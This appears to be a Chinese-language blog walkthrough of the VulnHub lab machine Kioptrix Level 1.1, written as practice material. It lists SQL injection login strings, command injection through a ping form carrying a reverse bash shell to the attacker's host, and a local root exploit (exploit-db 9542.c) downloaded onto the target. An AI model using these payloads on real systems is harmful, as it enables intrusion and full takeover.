Kioptrix: Level 1.1 (#2)

Kioptrix: Level 1.1 (#2)靶机
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/


目标
-得到root

*如果要下载来玩建议不要看, 因为剧透了

1.  打开你的Kali和靶机(Kioptrix: Level 1.1 (#2))

2. 使用netdiscover识别靶机. 


3. 使用Zenmap扫描靶机看有什么服务端口和确定是不是靶机.

4. 打开网页有的网页看看. 有个登入界面.

5. 看一下网页码发现有一个Username是Administator. 那么可能是字典爆破可以用.

6. 那么当我测试SQL Injection的时侯就登入了.
成功登入
USERNAME : ' or 1=1 -- -
PASSWORD : ' or 1=1 -- -
成功登入
USERNAME : Administator
PASSWORD : ' or 1=1 -- -

7. 就登入进来这个界面, 那个框框显示ping一个设备. 那么就ping自己的kali机.

8. 它就会进行ping的命令, 那么这就有可能可以同时运行两个以上的命令.
(在命令结束后马上运行第二个命令可以在它们之间用;符号

9. 那么试一试看能不能成功运行. ping我们的kali机;随便一串命令.

10. 是可以运行并可以带着其他命令.

11. 那么打开netcat监听666端口.

12. 试一试看能不能反弹一个BashShell回来. 
192.168.1.230;bash -i >& /dev/tcp/192.168.1.230/666 0>&1 

13. 成功反弹.

14. 基本盘查.

15. 检查一下/etc文件夹下有什么信息.

16. shadow需要权限, 然后就查看了redhat-release文件

17. 得到了CentOS的版本.

18. 得到就找找看有没有漏洞, 发现有两个.

19. 我就直接拿9542.c因为它著名CentOS 4.5了.

20. 把它复制到/root目录下.
#cp /usr/share/exploitdb/exploit/linux_x86/local/9542.c  /root/

21.打开查看运行条件
#cat 9542.c
发现是需要在本机运行的.

21.做一个暂时的HTTP服务在8080端口用来传输文件.

22. 进入/tmp文件夹,然后下载我们目录的9542.c

23. 因为它是.c文件所以把它编码, 再运行.
运行完成它有通知查看uid, 得到root了.

24. 再确定, 完成.

感谢阅读.

No comments:

Post a Comment